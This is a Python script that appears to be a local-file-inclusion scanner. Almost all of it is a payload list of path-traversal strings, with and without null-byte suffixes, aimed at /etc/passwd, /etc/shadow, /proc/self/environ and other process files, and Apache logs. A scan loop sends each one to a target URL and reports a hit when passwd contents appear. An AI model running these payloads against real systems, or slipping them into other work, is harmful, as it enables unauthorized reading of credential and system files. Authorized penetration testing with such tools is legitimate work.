import requests

class LFIScanner:
    def __init__(self, url):
        self.url = url
        self.payloads = [
            "../etc/passwd",
            "../../etc/passwd",
            "../../../etc/passwd",
            "../../../../etc/passwd",
            "../../../../../etc/passwd",
            "../../../../../../etc/passwd",
            "../../../../../../../etc/passwd",
            "../../../../../../../../etc/passwd",
            "../../../../../../../../../etc/passwd",
            "../etc/passwd%00",
            "../../etc/passwd%00",
            "../../../etc/passwd%00",
            "../../../../etc/passwd%00",
            "../../../../../etc/passwd%00",
            "../../../../../../etc/passwd%00",
            "../../../../../../../etc/passwd%00",
            "../../../../../../../../etc/passwd%00",
            "../../../../../../../../../etc/passwd%00",
            "../../../../../../../../../../../etc/passwd",
            "../../../../../../../../../../../etc/passwd%00",
            "../etc/shadow",
            "../../etc/shadow",
            "../../../etc/shadow",
            "../../../../etc/shadow",
            "../../../../../etc/shadow",
            "../../../../../../etc/shadow",
            "../../../../../../../etc/shadow",
            "../../../../../../../../etc/shadow",
            "../../../../../../../../../etc/shadow",
            "../etc/shadow%00",
            "../../etc/shadow%00",
            "../../../etc/shadow%00",
            "../../../../etc/shadow%00",
            "../../../../../etc/shadow%00",
            "../../../../../../etc/shadow%00",
            "../../../../../../../etc/shadow%00",
            "../../../../../../../../etc/shadow%00",
            "../../../../../../../../../etc/shadow%00",
            "../../../../../../../../../../../etc/shadow",
            "../../../../../../../../../../../etc/shadow%00",
            "../proc/self/environ",
            "../../proc/self/environ",
            "../../../proc/self/environ",
            "../../../../proc/self/environ",
            "../../../../../proc/self/environ",
            "../../../../../../proc/self/environ",
            "../../../../../../../proc/self/environ",
            "../../../../../../../../proc/self/environ",
            "../../../../../../../../../proc/self/environ",
            "../proc/self/environ%00",
            "../../proc/self/environ%00",
            "../../../proc/self/environ%00",
            "../../../../proc/self/environ%00",
            "../../../../../proc/self/environ%00",
            "../../../../../../proc/self/environ%00",
            "../../../../../../../proc/self/environ%00",
            "../../../../../../../../proc/self/environ%00",
            "../../../../../../../../../proc/self/environ%00",
            "../proc/self/cmdline",
            "../../proc/self/cmdline",
            "../../../proc/self/cmdline",
            "../../../../proc/self/cmdline",
            "../../../../../proc/self/cmdline",
            "../../../../../../proc/self/cmdline",
            "../../../../../../../proc/self/cmdline",
            "../../../../../../../../proc/self/cmdline",
            "../../../../../../../../../proc/self/cmdline",
            "../proc/self/cmdline%00",
            "../../proc/self/cmdline%00",
            "../../../proc/self/cmdline%00",
            "../../../../proc/self/cmdline%00",
            "../../../../../proc/self/cmdline%00",
            "../../../../../../proc/self/cmdline%00",
            "../../../../../../../proc/self/cmdline%00",
            "../../../../../../../../proc/self/cmdline%00",
            "../../../../../../../../../proc/self/cmdline%00",
            "../proc/self/status",
            "../../proc/self/status",
            "../../../proc/self/status",
            "../../../../proc/self/status",
            "../../../../../proc/self/status",
            "../../../../../../proc/self/status",
            "../../../../../../../proc/self/status",
            "../../../../../../../../proc/self/status",
            "../../../../../../../../../proc/self/status",
            "../proc/self/status%00",
            "../../proc/self/status%00",
            "../../../proc/self/status%00",
            "../../../../proc/self/status%00",
            "../../../../../proc/self/status%00",
            "../../../../../../proc/self/status%00",
            "../../../../../../../proc/self/status%00",
            "../../../../../../../../proc/self/status%00",
            "../../../../../../../../../proc/self/status%00",
            "../var/log/apache2/access.log",
            "../../var/log/apache2/access.log",
            "../../../var/log/apache2/access.log",
            "../../../../var/log/apache2/access.log",
            "../../../../../var/log/apache2/access.log",
            "../../../../../../var/log/apache2/access.log",
            "../../../../../../../var/log/apache2/access.log",
            "../../../../../../../../var/log/apache2/access.log",
            "../../../../../../../../../var/log/apache2/access.log",
            "../var/log/apache2/access.log%00",
            "../../var/log/apache2/access.log%00",
            "../../../var/log/apache2/access.log%00",
            "../../../../var/log/apache2/access.log%00",
            "../../../../../var/log/apache2/access.log%00",
            "../../../../../../var/log/apache2/access.log%00",
            "../../../../../../../var/log/apache2/access.log%00",
            "../../../../../../../../var/log/apache2/access.log%00",
            "../../../../../../../../../var/log/apache2/access.log%00",
            "../var/log/apache2/error.log",
            "../../var/log/apache2/error.log",
            "../../../var/log/apache2/error.log",
            "../../../../var/log/apache2/error.log",
            "../../../../../var/log/apache2/error.log",
            "../../../../../../var/log/apache2/error.log",
            "../../../../../../../var/log/apache2/error.log",
            "../../../../../../../../var/log/apache2/error.log",
            "../../../../../../../../../var/log/apache2/error.log",
            "../var/log/apache2/error.log%00",
            "../../var/log/apache2/error.log%00",
            "../../../var/log/apache2/error.log%00",
            "../../../../var/log/apache2/error.log%00",
            "../../../../../var/log/apache2/error.log%00",
            "../../../../../../var/log/apache2/error.log%00",
            "../../../../../../../var/log/apache2/error.log%00",
            "../../../../../../../../var/log/apache2/error.log%00",
            "../../../../../../../../../var/log/apache2/error.log%00"
        ]

    def scan(self):
        for payload in self.payloads:
            target_url = f"{self.url}/{payload}"
            response = requests.get(target_url)
            if "root:x:" in response.text:
                print(f"[+] LFI vulnerability found at: {target_url}")
            else:
                print(f"[-] LFI not found at: {target_url}")

if __name__ == "__main__":
    url = "http://example.com"  # Örnek bir URL
    scanner = LFIScanner(url)
    scanner.scan()